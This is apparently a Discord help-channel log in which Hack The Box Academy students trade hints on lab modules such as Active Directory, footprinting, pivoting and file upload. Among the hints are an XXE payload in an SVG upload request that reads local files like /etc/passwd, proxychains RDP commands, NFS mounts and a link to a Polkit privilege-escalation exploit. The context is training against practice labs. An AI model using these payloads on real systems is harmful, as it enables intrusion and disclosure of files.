Active Directory (AD) is the leading enterprise domain management suite, providing identity and access management, centralized domain administration, authentication, and much more. Due to the many features and complexity of AD, it presents a large attack surface that is difficult to secure properly. To be successful as infosec professionals, we ...
yay
shoot me a dm if you still need help
can any mods help me here??
this is the only channel I have access to
any mods here?
Wrong channel mate
and its still attached to that
well which channel should i post it in?
as every other channel is closed
You can reach out via #1024429874246590575
3 modules (and redoing Linux Priv Escalation) to go! Wheeeee! (and no please don't release another module before I've finished!)
hey, does anyone have a recommendation on which modules to start with and in which order I should learn them?
Injection Attacks is a cool module. You will have a lot of fun with it
Start with the path Information Security Foundations
is there a difference between using crackmapexec from binaries and crackmapexec in a Python environment?
Dm me if need help
@acoustic owl thank you
My next module in fact. Although I need to rebuild reputation with the wife faction first.
Hi, I want to ask something about Kerberos double hop. What if we got an initial shell as a user whose computer is joined to some domain, but klist in your reverse shell is 0, and you don't know the user's password because you got in from a reverse shell; also you are not administrator and it is not possible to escalate privilege. Is it still possible to enumerate the Active Directory from that situation?
you can do credentialed enum if I remember correctly
you mean enumerating credentials stored locally?
that has nothing to do with getting or not a kerberos ticket
if you have local admin you can do it
i meant asking DC things
the case is you are not local admin part
then u need to priv esc
not possible too
hi, having issues with the 2nd question on Intro to Metasploit,
Which version of Metasploit is free and can be used only through a CLI?
I'm fairly confident my answer is correct but it's not accepting it (tried a few variations)
what have u tried?
metasploit framework
Metasploit Framework
framework
Framework
try msfconsole
that is accepted but I don't believe that's the correct answer to the question / the correct question for that answer
if the question was "what is the command to run the free version of Metasploit" then I would have given that first try :p
oh well, thanks for the answer :p
np
my guess is that the "through the CLI" is why it's msfconsole instead of Metasploit Framework
msf = metasploit framework
console = cli
so that's likely what they were going with.
the whole module talks about the 2 versions being "Metasploit Framework" and "Metasploit Pro" though
Metasploit as a product is split into two versions. The Metasploit Pro version is different from the Metasploit Framework one with some additional features
well yes but they did say "through the CLI"
also module answers aren't always from the actual module itself, unlike THM.
They'll sometimes ask you to literally google the answer.
that's fine, but the module gives the names for the 2 versions and a comparison between them, q1 asks which version has a GUI, q2 asks which one is only usable with CLI
it's not that it required additional research beyond what the module contained, the module names the 2 versions several times and explains the differences between them, but then those names that were used are only correct for the first question
Yeah I agree. That answer annoyed me.
Can anyone help me with the Intro to Assembly Language first skills assessment? I'm hard stuck on it.
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
At first I tried writing my own code to decode it, but all the shellcodes that I got did not work. Then I decided to google a bit and found the code to do it on the HTB forums that should work, but after many attempts I still have seemingly gotten no closer. I can list all of the shellcodes that I have tried so far if it would be any help. So if anyone has any hint or ideas of what I could be doing wrong I would appreciate it.
Hi everyone! I'm currently in the AD module in the attacking domain trust ... from windows section. I've tried to connect in RDP with the new credentials but every time it says "wrong credentials". I've tried putting the domain inlanefreight.local before the user but that doesn't work either. Can anyone think of a way to fix this? It's holding me back. Thanks in advance.
Ok I found a solution, ty
Thank you for your response, I see now what they were looking for. It's worded really badly in my opinion. For example, it says the answer format is [key] + [key] + [key] which is only 3. So if you are going to say what the format is, it should say [key] + [key] + [key] + [key]. I would also disagree that shift, part of the shift %, should be a separate "flag" because the only way to get a % is to hit the shift button, that should be implied. I'm just ranting a bit, when it comes down to some of the non-standard flags like the HTB{} it tends to be a bit more picky.
File transfers -> Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
C:\Users\htb-student\Desktop>hasher upload_win.txt
8990089e402b00f809810659fefb5523
But the answer is incorrect. Any hints?
You might have downloaded the wrong file
Did u unzip the file?
I for the life of me can't find the RDP username on the Windows priv esc module - Further Credential Theft
yes, followed all the steps and got that what i posted.
I got a different hash myself
Gonna retake the steps then!
It's weird. I'm guessing you are hashing the zip itself and not the file inside the zip
I downloaded with wget, from some of my notes, sometimes a download from wget gets the original file while a browser download modifies metadata of the original file
Or maybe some problems during the upload, check with md5 hashes to see if the files are the same
I've downloaded via wget, powershell and web and used the web version! Will try it again. Thanks for the help guys.
I had a similar problem with b64 encoding, but was a mistake from my own
yeah, happens quite often
idk if you solved this by now, I managed to solve it in an unclean way, but I did get a solution. You can dm me what you have so far and I'll try to remember what I did
monged it and didn't realise I needed to change who I was logged in as lol
yeah I'm having the same issue
Can I get some help on the AD Enumeration and Attacks skills assessment part 2?
Hello, I'm stuck at the Footprinting hard module. I have obtained the private ssh key but I don't know how I can convert it to a public key. I have tried to vim it as id_rsa and chmod 600 but when I try to convert it I get bad permissions.
why are you trying to convert it?
Because when i try to ssh it wants the public key
yo
are you putting it in the right folder as id_rsa?
Yes I've saved it the desktop folder .ssh and from there im trying to connect
I haven't done the footprinting module, but let's get this straight
- A list of valid public keys for a user is stored in /home/$USER/.ssh/authorized_keys
- The private key's permissions need to be 600, doesn't really matter where you store it
- It is possible to get the public key from the private key, can't remember the command off the top of my head but it's very easy to google
Okay I will try, but does it matter how I save the private key, with what text editor and with what format?
I think you misunderstood the error code
so are you trying to log in as the ||tom|| user via ssh? or have you already logged in and are trying to do something else?
Yes, I'm trying to log in as tom via ssh
and do you have that user's ||key||?
I found the private key in the imap with ||Tom's|| credentials
I'm stuck in the imap of this module! Every fetch command gives me an error, any help is appreciated
you may want to put a spoiler tag on the name, and you can just chmod 600 the key and log in
which module and section are you on?
Fingerprinting module hard lab @vital adder I'm having trouble grabbing the emails within the imap server
give this a try https://donsutherland.org/crib/imap
Hello everyone
I'm in module "Dynamic Port Forwarding with SSH and SOCKS Tunneling"
I'm getting stuck on this question "Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop."
First, I did the Enabling Dynamic Port Forwarding with SSH part and tried using xfreerdp with proxychains "proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123" but it shows an error
[23:35:48:859] [957966:957976] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[23:35:48:872] [957966:957966] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
I also tried using rdesktop with proxychains but it says the username or password is not correct. "proxychains rdesktop -u victor -p pass@123 172.16.5.19"
I have tried to restart the lab several times and still have the same issue.
Do I miss something?
did you change the port in the config file? also try to scan port 3389 with nmap just to confirm that you have access to the target machine through the proxy
Yes, config file is already configured
└─$ tail -4 /etc/proxychains4.conf
socks4 127.0.0.1 9050
and nmap scan is reachable to target 172.16.5.19.
from the xfreerdp error it looks like a timeout issue, try adding this to your rdp command /timeout:80000
wow great, it's solved now.
Thank you
on windows priv esc any hints as to what share the .scf needs to go in for it to be activated
only getting my user
Figure out what shares/folders are writable by the user they give you
only one of them is
lol cheers got it, was mucking about in the network share
@vital adder when I fetch all it shows a bunch of irrelevant info, nothing really to see. I must be missing something
hint it's not fetch all
Linux Priv Polkit
try to compile on an older version of glibc
or you could use this one written in Go: https://github.com/An00bRektn/CVE-2021-4034
HELP: how can i open these urls in the browser?
they are not being found on the server even though I was able to upload them
So weird. I had forgotten I compiled it on my system first. When I first attempted to run it. I waited to compile on the target and it worked with no issues.
glibc 2.34 added some stuff that isn't exactly backwards compatible, so the target machine is probably running on something before it
also found these, but if I open them in the browser they only show the picture and no web shell
Just because you get a response code of 200 does not mean the file upload was successful
If the request uploaded, you would see it in the upload folder
Reread the section again, it gives you everything you need to do to bypass the filter
nobody said that xd
I see it was being uploaded in the response
I see it in the upload folder but can't access them
as \ changes to / once i open it in the browser
and these are accessible, just not as a shell but as a picture like this:
have you tried passing a parameter to the file anyway to see what happens?
hey guys, need help in "SQLMap Essentials" module
What's the contents of table flag5? (Case #5)
The contents of table flag5 are not retrieved
tried '--no-cast' switch well
that didn't work either
Hellos
Then that might mean that the reverse double extension isn't working
if it ends in jpg, the server will process it as a jpg
I thought I had the solution in my notes but apparently I forgot to copy the name so I could be wrong, but that's what it looks like from what you've shown
show command
same command?
mostly
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
oh ty
start-here
:(
why didnt work
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
All you gotta do is click the link and it tells you
No
tysm
hey, I'm stuck on Footprinting lab - Medium. I'm not sure how to get into the SQL Management Studio. I've got on through remmina with alex.
Local authentication, and you may need to explore the files to find an important document. That document also has the password for another (always present) Windows account
Nope
There's a file somewhere that contains the login
Just explore all files a* has access to
I believe it's titled "important"
Or something like that
I have faced the same problem in that section and in other sections where you need to compile a .c file, I moved the .c file to victim's machine and compiled there, and it works just fine
@fathom pendant found it! thank you, I struggle to think to do things I didn't already do in previous exercises
anyone got that ever before?
did you import the Burp certificate into your browser?
just re-added it, working thanks!
https://academy.hackthebox.com/module/136/section/1310
found the vulnerability and able to execute code via svg file
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg>&xxe;</svg>
but how can i access the root directory
tried almost every combination xd
most sense for **flag found at the root directory "/"** would be:
```xml
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
<svg>&xxe;</svg>
```
i think you should remove one slash
just like that file://flag.txt
sadly nothing :/
Host: 83.136.254.230:42616
Content-Length: 307
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfI5exmeUcKa6H2Me
Origin: http://83.136.254.230:42616
Referer: http://83.136.254.230:42616/contact/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundaryfI5exmeUcKa6H2Me
Content-Disposition: form-data; name="uploadFile"; filename="HTB.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file://flag.txt"> ]>
<svg>&xxe;</svg>
------WebKitFormBoundaryfI5exmeUcKa6H2Me--
you can try yourself if you want
but file:// returns the svg tags
wdym?
also took a look at /etc/mtab
kinda whack to not be able to see the directory but just only a file directly
enjoyed that threat hunting module.. I think I like Elastic over Splunk... not sure
They've both got positives and negatives. I think Elastic feels a lot nicer, and is a bit more intuitive.
yea, I like the way you filter on Elastic vs Splunk
the drill down, certainly
Footprinting lab - Medium. I can't figure out the syntax for MSSQL management studio. In query show doesn't work as a command. I've looked through microsoft's info but I'm not figuring it out.
You can look elsewhere without querying the database to find the login info…
I believe accounts is the name of the database, for the select statement you will need the name of the table
@umbral wigeon Thank you, I found 200 names and passwords but those are devaccs? None are HTB. Where can I learn CLI enumeration for this? I see other people have gotten stuck in the GUI before
use a WHERE clause
THANK YOU! got it with the where clause
You can
You can't use "fu" you have to use 'fu' (for the next person)
I am stuck
I tried for a few hours.. can anyone help whaat I am doing wrong here? https://academy.hackthebox.com/module/112/section/1079
I mounted the NFS share, and was able to cd into it as root. All I see are a bunch of ticket43243214321.txt files when I use the ls -a command. Nothing happens when I try to cat them.
Getting a permission denied(publickey) error when trying the EASY footprinting lab.
They gave the creds in the lab brief, why is this not working?
hey, I just did that lab and I am on the Medium one lol
When you do ls -la you'll notice that most are blank
Because the ssh service is set up to only accept the rsa key
So check other services
That's literally what that message means
am I allowed to post a screenshot?
guys I need help, I found a vuln: a 500 HTTP error because of its HTTP GET request, if I put a symbol in the parameters it turns into HTTP 500. How do I get the database with sqlmap?
Yes
Do ls -la
I can't post a screenshot
Not just -a
What's a good resource to research this issue further
Correct, read #rules and #welcome : short answer is your account here is not linked to the app.hackthebox.com account
Your issue is you need to find the rsa_id key
sorry, I thought I could talk about illegal stuff, mb
It's not an error, nor broken
I think I have it with nmap
I figured by your comment
I don't want to post it
You don't. You can't get it via nmap.
You have to enumerate and leverage another running service to obtain the key
I have the ssh-hostkey
Thats not the same
and the ssh-rsa
I cant believe thats all it was
Look at all running services. You will use the login credentials given to sign into one
The -l parameter gives it in a list format
If you want to take it a step further so you can unmount from the nfs share you can copy the ticket to your local machine @elfin cedar
Hello,
Can somebody remind me in which section we get wley's password in the active directory module?
Nope rerun any of the windows ones and you'll be able to find it. In future always save passwords/logins. If you haven't done the password attacks module: same concept. Always log credentials
(In reality I can't be bothered to find it, iirc during one of the hash grabbing ones I just took ALL the user hashes and bruted
I don't remember which one was the intentional wley account one
Tried FTP
not showing anything
now I'm stuck
@novel matrix completely hypothetically
Check all running ports
already did 22, ssh wouldn't accept creds
Use. Nmap
There's a reason I'm suggesting checking all running ports. How can you be so sure that you checked them all, if you don't check for them
I'll let it click
What service could be running on it
Take my previous advice
That is literally all I'm willing to tell you at this point
Because it's really that simple
And you have this process a lot easier than I did, I had to find [or use the previous hint] the username and password. You're flat out given it and told to hunt for the footprints
didn't work
Extended might be messing with it
did "ftp <user>@<ip>:2121
But I guarantee you that it's there
extended?!
Thanks, how would I find that besides trial and error
Reading the man page?
Huh that looks like a space after where it says "host"
[host [port] ]
You'd think if it was colon it would be [host:port]
Literally looking at the example you showed me
oh, got it, so SYNOPSIS means SYNTAX?
Yes
The other parts are just options
ALSO
Most other commands that allow you to choose the port have -p as an option. I can't think (aside from websites) of any commands that use : but I could be wrong
Got the private key, now I'm having issues authenticating with ssh using the key
I know there is very specific syntax as I've used it before, but I can't find it.
Give it the proper permissions
chmod
is it -i?
To use it?
Yes
Just make sure it has the right permissions set otherwise it'll throw an error at you
haha, yeah, -i was right, but the permissions were wrong
Told you :)
Thanks. I wasn't even to the point of needing to change permissions when you told me that, then I finally figured the syntax and tried it and was like "Okay MarcieLee you're one step ahead"
Working now, I googled the permission stuff
Trying to keep a good balance of making these conversations searchable with keywords without giving away spoilers!
I appreciate the help!
When copying over rsa keys always change the perms
Swear I've done it when on tryhackme, just didn't remember and my notes were weak at that point.
this is just advice for future ¯\_(ツ)_/¯
Also just an FYI, I'm literally only using my notes and memory to assist. As I'm currently without wifi for a bit
I got through a small moleskine notebook during my initial stages of IT/Cyber learning.
How are you on Discord without WIFI, mobile data?
Yep
My notes are in "Obsidian"
Definitely look that program up as it's free and utilizes markdown
I'm using Cherrytree. Obsidian came up during my search for a program.
mount: bad usage
Try 'mount --help' for more information.
trying Medium Footprinting and this is what I'm getting
Can't get a foothold in Footprinting Medium
Already tried NFS on port 2049.
The hint is confusing because it points to SQL which is not one of the ports found with the nmap scan
I'm basically trying everything at this point
Everything I've searched is people trying SQL and other stuff that doesn't work
Pretty much trying to mount NFS but it is not working
haha, even the hint mentions SQL, what am I missing?
Sql is only achievable internally
Stuck at the basics
Nfs is definitely a good start maybe revisit that section to see if it's a syntax issue
already got a good showmount
So maybe do that:)
Log in as root and proceed with directory listing
They haven't actually mounted it is the problem
Gz
Alrighty
just finished the hard footprinting
I don't know what you mean
From what it sounds like is that you weren't able to mount it?
Correct, no mount
Try adding TechSupport to the ip:/ portion
tried that first
I use Obsidian too @fathom pendant
I'm resetting my target
I dont recall having too much trouble with the nfs part. My notes don't reflect having issues
@fathom pendant is it possible to unhash a bcrypt password?
Idk, I think hashcat has a mode for it
lemme try downloading hashcat
Also read #rules and #welcome : this channel is for discussion and assistance with the learning content found at https://academy.hackthebox.com
thanks ya ❤️
Nfs start
Also make sure you're doing the syntax properly using sudo
mount.nfs: remote share not in 'host:dir' format
I'm trying to use a temporary folder in my home directory and pointing to it properly
what is the problem?
Try not having the colon
sudo mount -t nfs <ip>/TechSupport /home/kali/medfootprint -o nolock
this is what I'm doing
It's probably something simple
No reason this shouldn't work as far as I've found
I agree
Try just removing the file part
the /TechSupport part?
tried that
Ah
It's something simple and I'm blanking on it bc I really don't recall having issues
Still not working
nope
Only plan is the silver annual for it
They all tell you exactly what they give you
Inb4 gets tutoring and still can't answer what 9+10 is (joking)
Name?
Yes
Would I legally be allowed to offer academy assistance in exchange for money
Darn
There goes easy money
Smtp-user-enum.py and adding a -W 25 helps
I won't tell you any other info
Not necessarily. But there's definitely a good bunch of info readily available
You do know it. Read the prompt
DNS isn't smtp
You're thinking too hard
It's really that simple
Not all systems are going to be running a dns server
But yes a revshell will be your end goal
@elfin cedar since you just did this do you mind assisting @heavy marsh with this?
Footprinting: medium ^
poor guy got tagged for no reason haha
in case you still need help I'll dm you
Can you dm me the command syntax for the mount bc I swear I'm dumb xD and I can't sanity check
Yeah, my post got deleted in erratum
I've tried everything
How did my post get deleted?
A mod probably deleted it
They deleted my replies to you too
A mod employed by HTB?
Mods/admins tend to be volunteers; there are some that have the "staff" role though
First you need to understand the commands you are running, and of course, if you have mounted the share as root, a normal user won't be able to access it